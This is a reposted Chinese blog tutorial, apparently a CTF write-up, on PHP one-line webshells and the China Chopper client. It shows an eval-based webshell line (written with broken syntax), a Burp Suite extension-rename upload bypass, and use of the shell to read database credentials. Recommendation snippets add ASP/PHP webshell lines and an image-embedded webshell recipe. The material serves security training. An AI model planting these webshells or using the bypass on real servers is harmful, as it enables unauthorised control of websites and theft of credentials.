一句话木马及菜刀的使用

最新推荐文章于 2024-07-07 16:36:31 发布
最新推荐文章于 2024-07-07 16:36:31 发布
阅读量927 收藏 4
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/qingwuyou/p/10687472.html
版权

来一波原理:

eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false

<?php  @eval($_POST(‘1’);?>

各种绕过文件上传的姿势:https://blog.csdn.net/wy_97/article/details/76549761

如果你已经成功上传了一个一句话木马文件,那么现在就可以使用菜刀链接了

具体的步骤就是右键添加;输入url加上上传路径及上传文件,具体的可以参考这个例题:
题目链接:https://www.ichunqiu.com/battalion?t=1&r=0

解题步骤

  • 打开网页我们发现需要上传一个文件我们先尝试上传名为1.php的文件(本文件夹中)

此时我们将1.php文件扩展名改为1.jpg然后打开burpsuite抓包抓包之后我们将文件名改为1.php

然后点击forward

发现文件上传成功

  • 我们利用中国菜刀连接目标服务器

菜刀连接上去在里面发现了数据库配置文件config.php,看到了数据库账号密码

https://i-blog.csdnimg.cn/blog_migrate/7f63db430739c25881ed7455bcbbd781.jpeg

https://i-blog.csdnimg.cn/blog_migrate/bdece4ab8bb8ce40ec93329622ce055d.jpeg

编辑菜刀连接数据库上去拿到flag

https://i-blog.csdnimg.cn/blog_migrate/83b474dbe023f4c8ea29fffe2d21f841.jpeg

然后右键点击数据库管理进入到页面在页面上方输入sql语句寻找包含flag的文件

https://i-blog.csdnimg.cn/blog_migrate/7429a4a7215a8eea182ab9dc3fdc9f14.jpeg

 

转载于:https://www.cnblogs.com/qingwuyou/p/10687472.html

weixin_33720078
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Cknife 一句话连接工具.7z
07-17
【描述】描述中提到"Cknife里面有1.jsp一句话",这指的是Cknife工具中包含了一个名为"1.jsp"的一句话木马。这种木马通常是一段简短的Java代码,能够在Web服务器上执行命令,允许攻击者通过HTTP请求远程控制目标系统...
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
tmzy1的博客
03-24 3626
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
[SWPUCTF 2021 新生赛]caidao(一句话木马+蚁剑)
最新发布
2401_84499442的博客
07-07 181
第一种方法:直接post传参,首先eval函数是代码执行,那么我们就写入wllm=system('ls /'),查看服务器文件目录。很明显,这里的flag就是我们要找的文件,然后再执行wllm=system('cat /flag'),查看flag文件内容。当然,很明显,这里是一句话木马,那么我们也可以用蚁剑。第一步,因为他已经给出了密码“wllm”,那么我们就直接连接。然后从下往上依次查找文件,最终在/flga中找到flag。
文件上传一句话木马,用菜刀进行连接
XY011009的博客
12-02 9075
菜刀工具 提取码:tg6t 关于文件上传 文件上传是指由于网站没有任何过滤或者防护措施有限,而会被上传一些恶意文件,有些用户利用这个漏洞上传一句话木马(webshell),上传成功后就可以利用中国菜刀工具来进行对这个网站后一步的攻击。 1.无任何上传限制 这里可以直接上传一句话木马然后用菜刀工具进行连接 2.限制了文件类型 有些网站会有对文件类型限制的,发送文件的途中网站会对文件的类型进行检测,看...
CTF竞赛实战 中国菜刀一句话木马
热门推荐
keep coding
05-05 7万+
中国菜刀下载地址: http://pan.baidu.com/share/link?shareid=871753024&amp;uk=388464620一.基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录二.实战asp的一句话是:&lt;%eval request ("pass")%&gt;aspx的一句话是:&lt;%@ P...
PHP一句话木马
bolinmengling的博客
02-27 2万+
一句话木马的普通形式 <?php eval(@$_POST['password']);?> <?php ;?>是php的格式 eval是执行函数 POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过_POST是传入的参数,此处使用的是POST方式,同样存在GET、COOKIE方式,一句话木马通过P​OST是传入的参数,此处使用的...
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
php实现批量查询清除一句话后门的代码
10-30
一句话后门是一种常见的网页木马攻击方式,攻击者通过在网页代码中插入一段简短的恶意代码来获取网站的控制权。因其代码简短,隐蔽性强,所以很难被发现,并且危害巨大。 首先,文档中提到了一个名为Xall.php的文件...
PHP网站中的一句话木马安全性和防范措施的研究.pdf
01-05
最后,使用中国菜刀对当前一句话木马进行连接。 三、PHP一句话木马写入数据库或者网页文件的方式 一句话木马可以通过SQL注入漏洞或文件上传漏洞写入数据库或者网页文件。 SQL注入漏洞可以使用专用的工具,诸如啊D...
ACCESS导一句话拿webshell1
08-08
接着,向表"a"的"a"字段插入一句话木马,这里使用的是请求变量(#)执行代码: ```sql insert into a (a) values('(chr(35))%>') ``` 2. **导出为Excel文件**: 将表"a"的内容导出为一个Excel文件,利用以下SQL...
菜刀连接图片一句话木马
qq_18831583的博客
04-22 2万+
1、先制作图片一句话木马: 找好一张图片如”fox.jpg“,并且准备好一句话脚本php文件fox.php,在图片所在文件夹打开cmd命令行,执行命令:copy fox.jpg/b+fox.php/a fox1.jpg,生成图片一句话文件fox1.jpg 接下来用notepad++打开fox1.php图片,看看一句话也没有写入到图片当中,如图,一句话已经写入刀图片当中: ...
php一句话木马菜刀,如何基于菜刀PHP一句话实现单个文件批量上传?
weixin_35741494的博客
03-09 1914
本文原创作者:安全小飞侠0x00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀php一句话为例来分析一下如何实现这类需求。0x01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见...
一句话与中国菜刀的用法
netuser1937的博客
12-19 5312
一句话与中国菜刀的用法
文件上传漏洞(一句话木马)-学习笔记
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
中国菜刀php一句话,中国菜刀之写一句话木马变形
weixin_39879674的博客
04-01 861
了解一句话脚本的工作原理一句话脚本的工作原理:一句话恶意脚本分析服务端与客户端。(此处以asp脚本语言简述原理)一句话恶意脚本服务端就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 其中pass可以自己修改一句话恶意脚本客户端(即为中国菜刀主程序)用来向服务端提交控制数据...
菜刀一句话木马
weixin_44720762的博客
05-02 3829
中国菜刀,一个非常好用而又强大的webshell webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
一句话木马原理介绍和中国菜刀原理的介绍
Firebasky的博客
06-07 6526
菜刀,c刀,蚁剑都使用过。而且他们的方法基本上差不多。 今天突然心血来潮写来研究一下一句话木马菜刀的原理。 下面的原理是自己看其他大佬写的和自己总结的一些介绍。 希望能够帮助老表们~~~ 一句话木马原理 我这里就分析一下PHP代码,其他代码基本上差不多。希望老表们可以自己进行分析。 我们来看一下经典的一句话木马 <?php @eval($_POST['123']); ?> 前面的@表示如果脚本出现错误,则不显示错误。下面就是没有@的时候。会报错! 这里是加了@,则不会进行报错 ev
使用一句话木马进行读取文件flag,不能链接木马管理工具时
02-17 935
a=echo file_get_contents("../../../flag");
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值